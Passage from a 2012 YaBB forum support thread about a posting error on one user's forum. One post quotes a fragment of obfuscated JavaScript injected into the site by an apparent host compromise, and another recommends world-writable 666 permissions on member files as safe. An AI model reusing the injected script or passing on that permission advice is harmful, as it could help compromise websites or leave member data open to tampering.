Page Index Toggle Pages: 1 2 [3] 
Topic Tools
Very Hot Topic (More than 25 Replies) The Subject field was not filled out. It is requir (Read 4,418 times)
Bill Myers
God Member
Beta Testers
*****
Offline



Posts: 1,684
Location: Los Angeles

YaBB 2.5
Re: The Subject field was not filled out. It is requir
Reply #30 - Mar 18th, 2012 at 11:57pm
Post Tools
Edited:
Okay! I just reset all of the files in our Members directory to 666 from 644 per YaBB's instructions.

Admittedly, I'm perplexed why it is that other directories such as Messages have permissions currently set at 644 instead of 666 as YaBB instructs us to do. Our forum seems to be working fine as it is. Still, I guess because this issue came up about properly setting permissions, I should, and maybe will double check the permissions in our own forum to make sure that YaBB's instructions have been followed.

depablo wrote on Mar 18th, 2012 at 8:01pm:
cgi-bin/yabb2/Members/username.vars

right click on username and set permissions, maybe thats what Bill's talking about?

Yes, exactly, except of course you need to go into whatever directory that has your *.var files.

Possible important note: For whatever reason almost all of our own forum's *.var files have 644 permissions instead of 666, the latter of which is what YaBB instructs you to do, and yet, evidently our 644 files work just fine.

I'm surprised that 644 works because that only gives write permissions to the owner, i.e., the owner of that file, which presumably would be the webmaster; not the forum member. Then again, maybe 644 recognizes the member as the owner of their *.var file, so maybe that's why it works. Keep in mind, too, that members have other files associated with their *.var file, so surely all such files should be CHMOD 666 instead of 644.

Since YaBB instructs that all files in the Members directory be CHMOD 666, it seems that is exactly what should be done. To be frank, you'll probably be better off if you change permissions for all of the files in the Members directory from 644 to 666 per YaBB's instructions. That way, you're not likely to have members complaining about their membership not working properly.

If you don't already know, CHMOD 666 gives read and write permissions to everyone. Of course, since YaBB requires a password to be used to edit a profile, I think the 666 setting is perfectly fine, and again, that's what YaBB's instructions are anyway.

Caveat: In our forum I seem to recall setting permissions exactly as YaBB instructed me to do, i.e., all of the files in the Member directory were given permissions of 666 as instructed.

However, sometime last year all of our server's files were duplicated onto a new server when we changed its location from Los Angeles to Dallas. As such, the techs did this for us, so it's very possible that the permissons in the Members folder were changed from 666 to 644 without me knowing about it.

Because whatever changes may have been made didn't seem to adversely affect our forum, I never thought to check things out. "If it ain't broke, don't fix it." Of course, I've subsequently gotten complaints about memberships not working correctly, including at least one of our own test memberships. Changing permissions from 644 to 666 fixed the problems.

Thinking aloud here ... as soon as I post this reply, just to play it safe, I'm going to reset all permissions in our Member directory to 666. Having them set at 644 has been problematic. Done! Now changed to 666!  Cool

After all, that's per YaBB's own instructions anyway.   Roll Eyes

« Last Edit: Mar 19th, 2012 at 12:30am by Bill Myers »  

Morning, noon, or night, have a great one!

Note: This forum doesn't allow for us to freely edit our posts or topics to make corrections as needed, so please remember to look for subsequent posts if you see any mistakes or outdated information. Sorry for the inconvenience.
Back to top
IP Logged
 
Bill Myers
God Member
Beta Testers
*****
Offline



Posts: 1,684
Location: Los Angeles

YaBB 2.5
Re: The Subject field was not filled out. It is requir
Reply #31 - Mar 19th, 2012 at 12:20am
Post Tools
depablo wrote on Mar 18th, 2012 at 5:11pm:
Using ftp to chmod or just google chmod tutorial for cpanel etc


This CHMOD tutorial was very helpful. Thanks!

I needed the refresher course!  Wink

  

Morning, noon, or night, have a great one!

Note: This forum doesn't allow for us to freely edit our posts or topics to make corrections as needed, so please remember to look for subsequent posts if you see any mistakes or outdated information. Sorry for the inconvenience.
Back to top
IP Logged
 
xnoddyx
Support Team
Documentation Team
YaBB Moderators
YaBB Next Team
Beta Testers
****
Offline



Posts: 1,591
Location: UK:Scotland/livingston

None
Re: The Subject field was not filled out. It is requir
Reply #32 - Mar 19th, 2012 at 2:42am
Post Tools
i have sent JonB a pm to see if he thinks what i think and to confirm something else as well for me but untill he gets back to me i will shere this and see what you think.

when i first when to Bill 24 forum i got a blank page and dident think much of it and hit f5 but when it did load it was fine after that till i got the 1st error when testing but when i went off to test his forum on my server it was all fine then when i went to login back at his forum at this point i had my network mon runing i got the blank page agen but seen that it was downloading so i checked the page code and this is some of what was in it line 1 to line 2
Code
Select All
<script type="text/javascript" language="javascript"> var nhuiep=new Date( ); nhuiep.setTime(nhuiep.getTime( )+60938348); document.cookie="n_\x73ess_ok=36801b2847129f3d\x372e5bf\x31\x39b17cc299"+"; path\x3d\x2f; expi\x72es="+nhuiep.toGMTString( ); </script>
<script type="text/javascript" language="javascript"> var jgtqv="\x63\x61,c\x6f\x2cd\x61,de,c\x79,el,\x65n,e\x6f,e\x73,fi\x2cfr\x2cga\x2cit\x2cja\x2cj\x69,\x6bn,\x6el,\x6eo,\x70t,\x73v"; var jpeqcx=navigator.language || navigator.systemLanguage; var lang=jpeqcx.toLowerCase( ); lang=lang.substr(0,2); if (jgtqv.indexOf(lang)!=-1){vimega( ); }function vimega( ){
 


Edited:
and this was from YaBB.pl
« Last Edit: Mar 19th, 2012 at 2:45am by xnoddyx »  

YaBB install help video
1. what yabb forum are you running and the url
2. describe in as much detail as you can what happens and also post screenshots if you can
3. please be patient we live in different time zones and have other commitments but we will help you
as bill and ted say (Be excellent to each other)
Back to top
IP Logged
 
Bill 24
Junior Member
**
Offline



Posts: 94
Re: The Subject field was not filled out. It is requir
Reply #33 - Mar 19th, 2012 at 3:53am
Post Tools
When I get the error I checked my error log and this what I get.


Untrapped Error :
Can't call method "upload" on an undefined value at /var/www/virtual/jeffgordon-24/forum/Sources/Post.pl line 1289.
Script: /var/www/virtual/jeffgordon-24/forum/YaBB.pl
Line: 122
Subroutine:

http://jeffgordon-24.com/forum/YaBB.pl?board=123test123&action=post2&num=1332007....

Anyone know what this means?
Thanks in advance.
Bill
  
Back to top
 
IP Logged
 
xnoddyx
Support Team
Documentation Team
YaBB Moderators
YaBB Next Team
Beta Testers
****
Offline



Posts: 1,591
Location: UK:Scotland/livingston

None
Re: The Subject field was not filled out. It is requir
Reply #34 - Mar 19th, 2012 at 4:38am
Post Tools
Bill 24 wrote on Mar 19th, 2012 at 3:53am:
Anyone know what this means?Thanks in advance.Bill
           

see http://www.ehow.com/facts_7660302_definition-untrapped-runtime-error.html
  

YaBB install help video
1. what yabb forum are you running and the url
2. describe in as much detail as you can what happens and also post screenshots if you can
3. please be patient we live in different time zones and have other commitments but we will help you
as bill and ted say (Be excellent to each other)
Back to top
IP Logged
 
Dandello
YaBB Administrator
YaBB Next Team
Operations Team
Beta Testers
Support Team
*****
Offline



Posts: 2,383
Location: Earth

YaBB 2.6.1
Re: The Subject field was not filled out. It is requir
Reply #35 - Mar 19th, 2012 at 8:06am
Post Tools
Roughly, the error message is trying to say that Post.pl is throwing an error on line 1289 relating to uploading attachments - (that's what 'upload' relates to) Either no file was selected or something else like that is going on (maybe whatever issue is causing the subject field problem is doing something similar to the attachments field.)
  

If you only have one solution to a problem you're not trying hard enough!
Back to top
WWW  
IP Logged
 
xnoddyx
Support Team
Documentation Team
YaBB Moderators
YaBB Next Team
Beta Testers
****
Offline



Posts: 1,591
Location: UK:Scotland/livingston

None
Re: The Subject field was not filled out. It is requir
Reply #36 - Mar 19th, 2012 at 4:41pm
Post Tools
Dandello wrote on Mar 19th, 2012 at 8:06am:
Roughly, the error message is trying to say that Post.pl is throwing an error on line 1289 relating to uploading attachments - (that's what 'upload' relates to) Either no file was selected or something else like that is going on (maybe whatever issue is causing the subject field problem is doing something similar to the attachments field.)

his host got back to him and his host is having the same probs and confirm what i was thinking after getting the blank page with code in it that his host was hacked you can see in this vid the blank page with code

http://www.youtube.com/watch?v=QfGKPOxvr-U
  

YaBB install help video
1. what yabb forum are you running and the url
2. describe in as much detail as you can what happens and also post screenshots if you can
3. please be patient we live in different time zones and have other commitments but we will help you
as bill and ted say (Be excellent to each other)
Back to top
IP Logged
 
Dandello
YaBB Administrator
YaBB Next Team
Operations Team
Beta Testers
Support Team
*****
Offline



Posts: 2,383
Location: Earth

YaBB 2.6.1
Re: The Subject field was not filled out. It is requir
Reply #37 - Mar 20th, 2012 at 3:17am
Post Tools
At least he knows it's not an issue with YaBB itself. Hopefully his host will get things secured and squared away.
  

If you only have one solution to a problem you're not trying hard enough!
Back to top
WWW  
IP Logged
 
Bill 24
Junior Member
**
Offline



Posts: 94
Re: The Subject field was not filled out. It is requir
Reply #38 - Mar 21st, 2012 at 12:16am
Post Tools
I seem to be working fine now, I would like to Thank You all for the help, It seems the issue was with the server and here is the message I got from them, Not sure what it means, But I know it is working now.

Hi Bill,

Looks like we found the problem. The stats program was compiling stats hourly on the new server and was using up a lot of resources for several minutes. So we now have the stats running just twice a day.
  
Back to top
 
IP Logged
 
xnoddyx
Support Team
Documentation Team
YaBB Moderators
YaBB Next Team
Beta Testers
****
Offline



Posts: 1,591
Location: UK:Scotland/livingston

None
Re: The Subject field was not filled out. It is requir
Reply #39 - Mar 22nd, 2012 at 10:57am
Post Tools
Dandello wrote on Mar 20th, 2012 at 3:17am:
At least he knows it's not an issue with YaBB itself. Hopefully his host will get things secured and squared away.


yes i hope so as well but when thay re: like
Quote:
Hi Bill,Looks like we found the problem. The stats program was compiling stats hourly on the new server and was using up a lot of resources for several minutes. So we now have the stats running just twice a day.


dont explain the blank page with the torrent site links  Huh ah hosts  Cheesy lol

Bill 24 wrote on Mar 21st, 2012 at 12:16am:
I seem to be working fine now, I would like to Thank You all for the help, It seems the issue was with the server and here is the message I got from them, Not sure what it means, But I know it is working now.


its good that your back up and running  Wink
  

YaBB install help video
1. what yabb forum are you running and the url
2. describe in as much detail as you can what happens and also post screenshots if you can
3. please be patient we live in different time zones and have other commitments but we will help you
as bill and ted say (Be excellent to each other)
Back to top
IP Logged
 
Page Index Toggle Pages: 1 2 [3] 
Topic Tools
 
  « Board Index ‹ Board  ^Top